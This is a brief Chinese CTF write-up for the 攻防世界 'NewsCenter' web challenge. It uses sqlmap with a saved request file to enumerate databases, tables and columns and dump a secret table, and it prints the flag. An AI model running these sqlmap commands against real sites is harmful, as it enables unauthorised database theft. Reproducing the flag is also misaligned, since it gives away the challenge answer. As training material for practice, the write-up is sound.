打开环境
有查询,猜测是sql注入
保存请求头到文件中
准备利用sqlmap
查找数据库
python sqlmap.py -r ./123.txt --dbs
查找表
python sqlmap.py -r ./123.txt --tables -D news
查找字段
python sqlmap.py -r ./123.txt --column -D news -T secret_table
显示字段信息
python sqlmap.py -r ./123.txt --dump -D news -T secret_table -C fl4g
得到flag文章来源:https://www.toymoban.com/news/detail-700277.html
QCTF{sq1_inJec7ion_ezzz文章来源地址https://www.toymoban.com/news/detail-700277.html
到了这里,关于攻防世界-WEB-NewsCenter的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!